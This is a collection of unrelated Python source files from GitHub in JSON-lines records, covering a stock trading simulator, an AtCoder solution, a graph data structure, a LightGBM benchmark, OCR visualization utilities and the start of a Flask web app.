portfolio_dict_buy_and_hold_final[k]['current_price'] = final_close[k]\n return portfolio_dict_buy_and_hold_final\n\n\ndef run_trading_simulation (period, portfolio_dict, date, raw_market_data):\n print(f'here is the initial dict: {portfolio_dict}')\n days_remaining = period\n sell_side_complete = False\n updated_portfolio = portfolio_dict.copy()\n today_index = 2\n day_before_yesterday_index = today_index - 2\n\n while days_remaining > 0:\n print(f'analyzing stocks, {days_remaining} days left to analyze')\n market_data = raw_market_data.iloc[day_before_yesterday_index:today_index] #subset the raw market data to a df of three rows, current, previous, previous - 1\n updated_portfolio = run_trading_day(sell_side_complete, updated_portfolio, date, market_data)\n days_remaining -= 1\n today_index += 1 #must advance the date\n day_before_yesterday_index = today_index - 2\n print(f'here is the updated dict {updated_portfolio}')\n print(\"total value of current portfolio is: \" + total_value(updated_portfolio).astype('str'))\n #update the market price of the holdings in the dictionary here\n return updated_portfolio\n\ndef run_trading_day (sell_side_complete, portfolio_dict, date, market_data):\n print(sell_side_complete)\n # if sell_side_complete == False:\n # print('im buying!')\n # updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n # else:\n print('im selling!')\n # sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n \n sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n\n print('im buying!')\n updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n return updated_portfolio\n\ndef run_buy_side (portfolio_dict, date, market_data, threshold):\n ls_to_buy = portfolio.candidates_for_purchase(market_data, threshold) #based on overall candidates recent performance, what if security is already in portfolio? do we differentiate?\n remaining_purchases = len(ls_to_buy)\n portfolio_size = len(portfolio_dict.keys())\n cash = portfolio_dict['cash']\n try:\n cash_for_purchase = (cash / remaining_purchases)\n except:\n cash_for_purchase = 0\n\n while ((cash - transaction_fee) > 0) & (len(ls_to_buy)>0) & (portfolio_size > 0) & (portfolio_size < max_holdings):\n ticker = ls_to_buy.pop(0)\n\n if (ticker not in portfolio_dict.keys()) & (portfolio_size > 0) & ((cash_for_purchase - transaction_fee) > 0):\n portfolio_dict[ticker] = portfolio.make_an_empty_holding()\n portfolio_dict[ticker] = portfolio.purchase_shares(ticker, 'buy', cash_for_purchase, market_data, portfolio_dict[ticker])\n portfolio_dict['cash'] -= cash_for_purchase\n portfolio_size = portfolio.how_many_holdings_to_buy(portfolio_dict)\n cash = portfolio_dict['cash']\n portfolio_size = len(portfolio_dict.keys())\n \n return portfolio_dict\n\ndef run_sell_side (portfolio_dict, date, market_data):\n ls_to_sell = portfolio.candidates_for_sale(portfolio_dict, market_data, portfolio.threshold ) #based on what is in portfolio now\n action = 'sell'\n print(ls_to_sell)\n for holding in ls_to_sell:\n if holding == 'all holdings are down!':\n pass\n else:\n portfolio_dict = portfolio.sell_shares(holding, action, portfolio_dict, market_data)\n sell_side_complete = True\n return sell_side_complete, portfolio_dict\n\ndef total_value (portfolio_dict: dict())->float():\n tmp_value = float()\n for k, v in portfolio_dict.items():\n if k == 'cash':\n pass\n else:\n tmp_value += (portfolio_dict[k]['units'] * portfolio_dict[k]['current_price'])\n \n tmp_value = tmp_value + portfolio_dict['cash']\n return tmp_value\n\n\nif __name__ == \"__main__\":\n \n case_studies = {}\n total_transactions = []\n for sim in range(29):\n portfolio = Portfolio()\n portfolio_dict_raw = {}\n portfolio_dict_raw = portfolio.get_new_portfolio(raw_market_data.iloc[:2], specific_ls=[]).copy()\n print(f'here is the very beginning of dict: {portfolio_dict_raw}')\n portfolio_dict_buy_and_hold = copy.deepcopy(portfolio_dict_raw)\n portfolio_dict_buy_and_hold_final = assess_buy_and_hold(portfolio_dict_buy_and_hold, raw_market_data)\n final_value_buy_and_hold = total_value(portfolio_dict_buy_and_hold_final)\n output_portfolio = run_trading_simulation(time_window, portfolio_dict_raw, today, raw_market_data)\n final_value_buy_and_sell = total_value(output_portfolio)\n case_studies[sim] = {'buy_and_hold':[final_value_buy_and_hold, list(portfolio_dict_buy_and_hold_final.keys())], 'buy_and_sell': [final_value_buy_and_sell, list(output_portfolio.keys())]} #'buy_and_hold':final_value_buy_and_hold,\n total_transactions.append(portfolio.transaction_tracker)\n\n\n","repo_name":"andrewcmilne/stock_analyzer","sub_path":"src/trading_day.py","file_name":"trading_day.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"13679790750","text":"from math import gcd\nimport sys\nsys.setrecursionlimit(1000000)\n\ndef main():\n N = int(input())\n A = list(map(int, input().split()))\n tmp = gcd(A[0],A[1])\n set_A = set(A)\n for i in range(2,N):\n tmp = gcd(tmp, A[i])\n\n if tmp != 1:\n print('not coprime')\n exit()\n max_A = max(A)\n ans = [False] * (max_A + 1)\n flag = True\n def divisor(n):\n ass = []\n for i in range(1,int(n**0.5)+1):\n if n%i == 0:\n ass.append(i)\n if ans[i]:\n return False\n if i != 1:\n ans[i] = True\n if i**2 == n:\n continue\n if ans[n//i]:\n return False\n ans[n//i] = True\n ass.append(n//i)\n if n != 1:\n ans[n] = True\n return True #sortされていない\n for a in A:\n if not divisor(a):\n flag = False\n break\n\n if flag:\n print('pairwise coprime')\n else:\n print('setwise coprime')\n \n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"tails1434/Atcoder","sub_path":"ABC/177/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"73984560648","text":"import argparse\n\nparser = argparse.ArgumentParser(description=\"Run\")\nparser.add_argument('--runnable', '-m', type=str, default=\"chatbot\", help=\"The file to run.\")\n\nargs = parser.parse_args()\n\nif args.runnable == \"chatbot\":\n from runnable.chatbot import run_chatbot\n \n run_chatbot()\n \nelif args.runnable == \"endpoint\":\n from runnable.endpoint import run_model_endpoint\n \n run_model_endpoint()\n \nelif args.runnable == \"discord_index\":\n from runnable.discord_index import run_discord_index\n \n run_discord_index()\n \nelif args.runnable == \"querier\":\n from backend.querier import run_querier\n \n run_querier()\n \nelse :\n raise Exception(\"Invalid runnable.\")","repo_name":"Pangasius/llama-index-tests","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"26809306747","text":"import json\nfrom typing import Optional, Union\n\n\nclass AdjacencyListGraph:\n def __init__(self, is_directed: bool = False, is_weighted: bool = False) -> None:\n self.graph: dict[int, list[Union[int, list]]] = {}\n self.is_directed = is_directed\n self.is_weighted = is_weighted\n\n def __str__(self) -> str:\n return json.dumps(self.graph)\n\n def add_vertex(self, vertex: int) -> None:\n \"\"\"Insert a new Vertex.\"\"\"\n if vertex not in self.graph:\n self.graph[vertex] = []\n\n def add_edge(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Insert and return a new Edge from vertex_1 to vertex_2 with auxiliary element weight.\"\"\"\n for vertex in [vertex_1, vertex_2]:\n self.add_vertex(vertex)\n\n if self.is_edge_existed(vertex_1, vertex_2):\n return\n\n self.graph[vertex_1].append([vertex_2, weight] if self.is_weighted else vertex_2)\n if not self.is_directed:\n self.graph[vertex_2].append([vertex_1, weight] if self.is_weighted else vertex_1)\n\n def is_edge_existed(self, vertex_1: int, vertex_2: int) -> bool:\n \"\"\"Return the boolean value representing the connection between 2 vertices\"\"\"\n for adjacent_vertex in self.get_adjacent_vertices(vertex_1):\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex_2:\n return True\n return False\n\n def get_edge_weight(self, vertex_1: int, vertex_2: int) -> Optional[int]:\n \"\"\"Return the weight of the edge from vertex_1 to vertex_2, or None if not adjacent.\"\"\"\n if not self.is_weighted:\n return None\n\n for adjacent_vertex, weight in self.get_adjacent_vertices(vertex_1):\n if adjacent_vertex == vertex_2:\n return weight\n\n return None\n\n def set_edge_weight(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Set the weight of the edge from vertex_1 to vertex_2 if adjacent.\"\"\"\n if not self.is_weighted:\n return\n\n if not self.is_edge_existed(vertex_1, vertex_2):\n return\n\n for start_vertex, end_vertex in (\n [(vertex_1, vertex_2)] if self.is_directed else [(vertex_1, vertex_2), (vertex_2, vertex_1)]\n ):\n for adjacent_vertex in self.get_adjacent_vertices(start_vertex):\n if adjacent_vertex[0] == end_vertex:\n adjacent_vertex[1] = weight\n\n def vertex_count(self) -> int:\n \"\"\"Return the number of vertices in the graph.\"\"\"\n return len(self.graph.keys())\n\n def edge_count(self) -> int:\n \"\"\"Return the number of edges in the graph.\"\"\"\n total_edges = sum(len(adjacent_vertices) for adjacent_vertices in self.graph.values())\n return total_edges if self.is_directed else total_edges // 2\n\n def vertices(self) -> list[int]:\n \"\"\"Return a list of all vertices of the graph.\"\"\"\n return list(self.graph.keys())\n\n def edges(self) -> list[tuple]:\n \"\"\"Return a list of all edges of the graph.\"\"\"\n edges = []\n for vertex, adjacent_vertices in self.graph.items():\n for adjacent_vertex in adjacent_vertices:\n edges.append((vertex, *adjacent_vertex) if self.is_weighted else (vertex, adjacent_vertex))\n return edges\n\n def get_adjacent_vertices(self, vertex: int) -> list[Union[int, list]]:\n \"\"\"Return a list of all vertices connecting with the vertex.\"\"\"\n return self.graph.get(vertex, [])\n\n def in_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of incoming edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n in_degree_total = 0\n for vertex_value, adjacent_vertices in self.graph.items():\n if vertex_value == vertex:\n continue\n\n for adjacent_vertex in adjacent_vertices:\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex:\n in_degree_total += 1\n\n return in_degree_total\n\n def out_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of outgoing edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n return len(self.get_adjacent_vertices(vertex))\n\n def degree(self, vertex: int) -> int:\n \"\"\"Return number of incident edges to the vertex in the graph.\"\"\"\n if self.is_directed:\n return self.in_degree(vertex) + self.out_degree(vertex)\n\n return len(self.get_adjacent_vertices(vertex))\n\n\nif __name__ == \"__main__\":\n for is_directed, is_weighted in [(False, False), (True, False), (False, True), (True, True)]:\n graph = AdjacencyListGraph(is_weighted=is_weighted, is_directed=is_directed)\n graph.add_vertex(0)\n graph.add_vertex(1)\n graph.add_vertex(2)\n graph.add_edge(1, 2, 1)\n graph.add_edge(2, 3, 2)\n graph.add_edge(4, 3, 3)\n graph.add_edge(4, 5, 4)\n\n assert graph.is_edge_existed(0, 1) is False\n assert graph.is_edge_existed(1, 2) is True\n assert graph.is_edge_existed(2, 1) is False if is_directed else True\n\n assert graph.get_edge_weight(0, 1) is None\n assert graph.get_edge_weight(1, 2) == (1 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (1 if is_weighted and not is_directed else None)\n\n graph.set_edge_weight(1, 2, 5)\n assert graph.get_edge_weight(1, 2) == (5 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (5 if is_weighted and not is_directed else None)\n\n assert graph.vertex_count() == 6\n assert graph.edge_count() == 4\n assert graph.vertices() == [0, 1, 2, 3, 4, 5]\n\n assert graph.in_degree(2) == (1 if is_directed else None)\n assert graph.out_degree(2) == (1 if is_directed else None)\n assert graph.degree(2) == 2\n\n if not is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 1),\n (2, 3),\n (3, 2),\n (3, 4),\n (4, 3),\n (4, 5),\n (5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [1, 3]\n elif is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 3),\n (4, 3),\n (4, 5),\n ]\n assert graph.get_adjacent_vertices(2) == [3]\n elif not is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 1, 5),\n (2, 3, 2),\n (3, 2, 2),\n (3, 4, 3),\n (4, 3, 3),\n (4, 5, 4),\n (5, 4, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[1, 5], [3, 2]]\n elif is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 3, 2),\n (4, 3, 3),\n (4, 5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[3, 2]]\n","repo_name":"duongleh/data-structures-and-algorithms","sub_path":"Graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"20788061765","text":"import dataclasses\nimport gemmi\nfrom ..job import Job\nfrom ..reflections import DataItem, write_mtz\nfrom ..structure import read_structure, write_mmcif\n\n\n@dataclasses.dataclass\nclass SheetbendResult:\n structure: gemmi.Structure\n seconds: float\n\n\nclass Sheetbend(Job):\n def __init__(\n self,\n structure: gemmi.Structure,\n fsigf: DataItem,\n freer: DataItem = None,\n regularise: bool = False,\n ):\n super().__init__(\"csheetbend\")\n self.structure = structure\n self.fsigf = fsigf\n self.freer = freer\n self.regularise = regularise\n\n def _setup(self) -> None:\n write_mmcif(self._path(\"xyzin.cif\"), self.structure)\n write_mtz(self._path(\"hklin.mtz\"), [self.fsigf, self.freer])\n self._args += [\"-mtzin\", \"hklin.mtz\"]\n self._args += [\"-colin-fo\", self.fsigf.label()]\n if self.freer is not None:\n self._args += [\"-colin-free\", self.freer.label()]\n self._args += [\"-pdbin\", \"xyzin.cif\"]\n self._args += [\"-pdbout\", \"xyzout.cif\"]\n self._args += [\"-cycles\", \"12\"]\n self._args += [\"-resolution-by-cycle\", \"6,3\"]\n if self.regularise:\n self._args += [\"-postrefine-u-iso\"]\n self._args += [\"-pseudo-regularize\"]\n self._args += [\"-refine-regularize-cycles\", \"3\"]\n\n def _result(self) -> SheetbendResult:\n self._check_files_exist(\"xyzout.cif\")\n return SheetbendResult(\n structure=read_structure(self._path(\"xyzout.cif\")),\n seconds=self._seconds,\n )\n","repo_name":"paulsbond/modelcraft","sub_path":"modelcraft/jobs/sheetbend.py","file_name":"sheetbend.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"16843222590","text":"import time \nimport lightgbm as lgb \nimport argparse \nfrom sklearn.datasets import make_classification \nfrom sklearn.model_selection import train_test_split \n \n \ndef benchmark_lightgbm(n_rows=100000, n_cols=20, n_classes=2, verbose=True): \n # Generate a random n-class classification problem \n if verbose: \n print(f\"Generating dataset with {n_rows} samples, {n_cols} features...\") \n X, y = make_classification( \n n_samples=n_rows * 2, n_features=n_cols, n_classes=n_classes \n ) \n X_train, X_test, y_train, y_test = train_test_split( \n X, y, random_state=42, test_size=0.5 \n ) \n \n # Define parameters for the LightGBM classifier \n param = { \n \"objective\": \"multiclass\", \n \"num_class\": n_classes, \n \"metric\": \"multi_logloss\", \n \"verbosity\": -1, \n } \n num_round = 20 # the number of training iterations \n \n # Train the model and measure the time it takes \n if verbose: \n print(\"Training model...\") \n start_time = time.time() \n bst = lgb.train(param, lgb.Dataset(X_train, label=y_train), num_round) \n end_time = time.time() \n \n # Measure the time it takes to make predictions \n if verbose: \n print(\"Making predictions...\") \n start_time_pred = time.time() \n predictions = bst.predict(X_test) \n end_time_pred = time.time() \n \n # Return the time it took to train the model and to make predictions \n train_time = end_time - start_time \n pred_time = end_time_pred - start_time_pred \n if verbose: \n print(f\"Training time: {train_time} seconds\") \n print(f\"Prediction time: {pred_time} seconds\") \n results = {\"train_time\": train_time, \"pred_time\": pred_time} \n return results \n \n \nif __name__ == \"__main__\": \n parser = argparse.ArgumentParser() \n parser.add_argument( \n \"--rows\", type=int, default=100000, help=\"Number of rows in the dataset\" \n ) \n parser.add_argument( \n \"--cols\", type=int, default=20, help=\"Number of columns in the dataset\" \n ) \n args = parser.parse_args() \n \n benchmark_lightgbm(n_rows=args.rows, n_cols=args.cols) \n","repo_name":"detrin/datasci-benchmark","sub_path":"lightgbm_benchmark.py","file_name":"lightgbm_benchmark.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"41183375545","text":"import torch\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport cv2\nimport math\nimport random\nimport numpy as np\n\n_tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)] \n \n# Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts. \nfor i in range(len(_tableau20)): \n r, g, b = _tableau20[i] \n _tableau20[i] = (r / 255., g / 255., b / 255.) \n\n\n\ndef _setup_image(model_input, batch_id=None):\n # Handle torch Variable instances\n if batch_id is None:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data\n else:\n img = model_input\n else:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data[batch_id]\n else:\n img = model_input[batch_id]\n\n # Copy to CPU if needed\n if isinstance(img, torch.cuda.FloatTensor):\n img = img.cpu()\n\n # NumPy-ify and change from CHW to HWC\n img = img.numpy().transpose( (1,2,0) )\n\n # Undo image normalization\n img = img*(-255)+255\n\n if img.shape[2] == 1:\n # matplotlib plots grayscale images correctly only if you get rid of channel dimension\n img = img[:,:,0]\n cmap = plt.cm.gray\n else:\n # OpenCV images are BGR whereas matplotlib assumes RGB\n img = cv2.convertColor(img, cv.COLOR_BGR2RGB)\n cmap = None # fallback to default\n\n return img, cmap \n\n\ndef _form_display_char(idx, alphabet):\n # Special case for CTC Blank\n if idx == 0:\n return '_'\n\n # Special case for space so it shows up\n if alphabet[idx] == 'u0020':\n return '[SP]'\n \n # Otherwise, just convert to utf-8\n return chr(int(alphabet[idx][1:], 16))\n\ndef _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id=None):\n # Actual model output is not set to probability vector yet, need to run softmax\n probs = torch.nn.functional.softmax(model_output.view(-1, model_output.size(2))).view(model_output.size(0), model_output.size(1), -1)\n\n if batch_id is None:\n batch_id = 0\n\n # Handle torch Variable instances\n if isinstance(probs, torch.autograd.Variable):\n probs = probs.data[:,batch_id,:]\n else:\n probs = probs[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Squeeze away unused dimension\n probs.squeeze_()\n\n # Now let's cycle through frames and check for low confidence regions\n low_confidence_spans = []\n topk = 5\n for t in range(probs.size(0)):\n topk_vals, topk_idxs = torch.topk(probs[t], topk)\n if topk_vals[0] < conf_thresh:\n options = []\n for i in range(topk):\n char = _form_display_char(topk_idxs[i], alphabet)\n options.append( (char, topk_vals[i], topk_idxs[i] ) )\n tot_conf = 0\n for _, prob, _ in options:\n tot_conf += prob\n\n if tot_conf >= conf_thresh:\n break\n\n low_confidence_spans.append( (t, t, options) )\n\n\n return low_confidence_spans\n\ndef _decode_with_alignment_spans(model_output, alphabet, batch_id=None):\n min_prob_thresh = 3* 1/len(alphabet)\n\n if batch_id is None:\n batch_id = 0\n # Handle torch Variable instances\n if isinstance(model_output, torch.autograd.Variable):\n probs = model_output.data[:,batch_id,:]\n else:\n probs = model_output[:,batch_id,:]\n\n # Copy to CPU if needed\n if isinstance(probs, torch.cuda.FloatTensor):\n probs = probs.cpu()\n\n # Now time to decode\n argmaxs, argmax_idxs = probs.max(dim=1)\n argmax_idxs.squeeze_()\n argmaxs.squeeze_()\n prev_max = None\n span_start = 0\n\n alignment_tuples = []\n for t in range(probs.size(0)):\n cur_max_prob = argmaxs[t]\n cur_max = argmax_idxs[t]\n\n # Heuristic\n # If model is predicting very low probability for all letters in alphabet, treat that the\n # samed as a CTC blank\n if cur_max_prob < min_prob_thresh:\n cur_max = 0\n\n if prev_max is None:\n prev_max = cur_max\n continue\n if prev_max != cur_max:\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, t, char, prev_max) )\n span_start = t+1\n prev_max = cur_max\n\n # Handle last leftover if nescesary\n if span_start != probs.size(0):\n char = _form_display_char(prev_max, alphabet)\n alignment_tuples.append( (span_start, probs.size(0)-1, char, prev_max) )\n\n return alignment_tuples\n\n\n\ndef display_target(target, alphabet):\n string_utf8 = \"\"\n string_uxxxx = \"\"\n for char_idx in target:\n string_uxxxx += alphabet[char_idx] + ' '\n string_utf8 += chr(int(alphabet[char_idx][1:], 16))\n\n print(\"Target utf8 string is [%s]\" % string_utf8)\n\n # For Arabic, it is sometimes helpful to dipslay the uxxxx output\n# if not alphabet.left_to_right:\n# print(\"Target uxxxx string is: \\n\\t%s\" % string_uxxxx)\n\ndef display_image(model_input, batch_id=None):\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef overlay_hidden_activations(model_input, hidden, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n\n # (1) Setup raw plot of hidden activations overlayed on image\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now simply plot hidden activations in image\n if isinstance(hidden, torch.autograd.Variable) or isinstance(hidden, torch.FloatTensor):\n hidden = hidden.cpu().numpy()\n\n ax2 = ax.twinx()\n hidden_xs = range(hidden.shape[0])\n hidden_xs = [x*scale_factor for x in hidden_xs]\n ax2.plot(hidden_xs, hidden)\n ax2.set_ylim(-1,1)\n ax2.set_yticks([])\n ax2.set_xticks([])\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n # (2) Setup color-coded background overlay\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n for t in range(hidden.shape[0]):\n left_x = scale_factor*t - left_correction\n right_x = scale_factor*(t+1) + right_correction\n \n #seismic or bwr\n ax.axvspan(left_x, right_x, color=plt.cm.seismic( (hidden[t]+1)/2 ), alpha=0.5)\n\n\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\n\ndef overlay_alignment(model_input, model_output, alphabet, scale_factor=(1.0/0.49), batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n\n # Now handle argmax decoding\n alignment_tuples = _decode_with_alignment_spans(model_output, alphabet, batch_id)\n\n # Now color-code spans\n for span_start, span_end, span_char, span_char_id in alignment_tuples: \n letter_color = _tableau20[span_char_id % len(_tableau20)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=letter_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_y = -10\n rotation = 0\n label_x_correction = 0\n if span_char == \"[SP]\":\n rotation = 90\n label_x_correction = -2\n label_y = -20\n\n ax.annotate(span_char, (label_x,0), (label_x + label_x_correction, label_y), arrowprops={'arrowstyle': '->'}, xycoords='data', textcoords='data', rotation=rotation)\n\n # Finally, show image\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n\n\ndef display_low_confidence_regions(model_input, model_output, alphabet, scale_factor=(1.0/0.49), conf_thresh=0.99, batch_id=None):\n # Setup input image\n img, cmap = _setup_image(model_input, batch_id)\n\n # Need to determine appropriate figure size\n # For now, hardcoded to 12 inches wide seems to work okay\n w = 12\n h = math.ceil(img.shape[0] * w / img.shape[1])\n fig = plt.figure(figsize=(w,h), dpi=300)\n\n # Setup axis with a bit of margin for viewability\n margin=0.05\n ax = fig.add_axes([margin, margin, 1 - 2*margin, 1 - 2*margin])\n ax.set_yticks([])\n ax.set_xticks([])\n\n # Now handle argmax decoding\n spans = _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id)\n\n low_conf_area = 0\n low_conf_area_v2 = 0\n\n # Use these to remember the number of characters we showed previuosly, to properly position current labels\n # Even-numbered spans are above the image and odd-numbered spans are below, so keep track of both seperately\n prev_len_even = 2\n prev_len_odd = 2\n\n # Now color-code spans\n for span_idx, (span_start, span_end, char_array) in enumerate(spans): \n low_conf_area += (span_end - span_start + 1)\n\n # Want to count perent of area where confusion is between more than one character in the model,\n # Not just between CTC-Blank and a character in the model\n if len(char_array) > 2 or (len(char_array) == 2 and (char_array[0][2] != 0 and char_array[1][2] != 0)):\n low_conf_area_v2 += (span_end - span_start + 1)\n\n span_color = _tableau20[random.randint(0, len(_tableau20)-1)]\n\n # Correct for interpolation due to scaling\n # Basic idea is to split the difference: half of 'gap' goes to left-side, half of 'gap' goes to right side\n left_correction = math.floor(scale_factor/2)\n right_correction = math.floor(scale_factor/2)\n\n left_x = scale_factor*span_start - left_correction\n right_x = scale_factor*span_end + right_correction\n\n ax.axvspan(left_x, right_x, color=span_color, alpha=0.5)\n\n # Place label for span in center of span\n # Also prepare line segment to point to span\n label_x = (left_x + right_x)/2\n label_x_correction = -8\n\n delta = 10\n if span_idx % 2 == 0:\n delta_y = -delta\n arrow_y = 5\n\n if span_idx % 4 == 0:\n label_y = -delta\n else:\n label_y = -delta + prev_len_even * delta_y \n\n\n prev_len_even = len(char_array)\n else:\n delta_y = delta\n arrow_y = img.shape[0] - delta\n\n if span_idx % 4 == 1:\n label_y = img.shape[0] + delta\n else:\n label_y = delta + prev_len_odd * delta_y + img.shape[0]\n\n prev_len_odd = len(char_array)\n char_array = list(reversed(char_array))\n\n for i, (char, prob, char_idx) in enumerate(char_array):\n if i == len(char_array)-1:\n ax.annotate(\"%s (%d)\" % (char,int(100*prob)), (label_x,arrow_y), (label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1))), arrowprops={'arrowstyle': '->', 'alpha': 0.2}, xycoords='data', textcoords='data', color=span_color)\n else:\n ax.text(label_x + label_x_correction, (label_y + delta_y*(len(char_array)-i-1)), \"%s (%d)\" % (char,int(100*prob)), color=span_color)\n\n\n\n # Finally, show image\n print(\"Percentage of frames having confidence < %.2f is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area/model_output.size(0)))\n print(\"Percentage of frames having confidence < %.2f with confusion b/w more than CTC blank is %.2f%%. Shown below:\" % (conf_thresh, 100*low_conf_area_v2/model_output.size(0)))\n ax.set_yticks([])\n ax.set_xticks([])\n ax.imshow(img, cmap=plt.cm.gray)\n plt.show()\n","repo_name":"isi-vista/VistaOCR","sub_path":"src/utils/visualization.py","file_name":"visualization.py","file_ext":"py","file_size_in_byte":13794,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"16"}
+{"seq_id":"10470704141","text":"from flask import Flask, jsonify, request, make_response, render_template\nfrom flask import render_template, redirect, url_for, flash\nfrom flask_login import UserMixin, LoginManager\nfrom flask_login import login_user, login_required, current_user, logout_user\nfrom flask_login import login_required, current_user # After login - Profile\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flask_socketio import SocketIO, send, emit\nfrom flask_cors import CORS\n\n\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\nfrom datetime import datetime\n\napp = Flask(__name__)\nCORS(app)\napp.config['SECRET_KEY'] = 'secret-key-goes-here'\nsocketio = SocketIO(app)\n\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///AirCADia_Nebos.db'\ndb = SQLAlchemy(app)\n\nlogin_manager = LoginManager()\nlogin_manager.login_view = 'login'\nlogin_manager.init_app(app)\n\n@login_manager.user_loader\ndef load_user(user_id):\n # since the user_id is just the primary key of our user table, use it in the query for the user\n return User.query.get(int(user_id))\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/aircadia_nebos')\n@login_required\ndef aircadia_nebos():\n return render_template('AircadiaNebos/AirCADiaNebos.html')\n\n@app.route('/profile')\n@login_required\ndef profile():\n return render_template('profile.html', 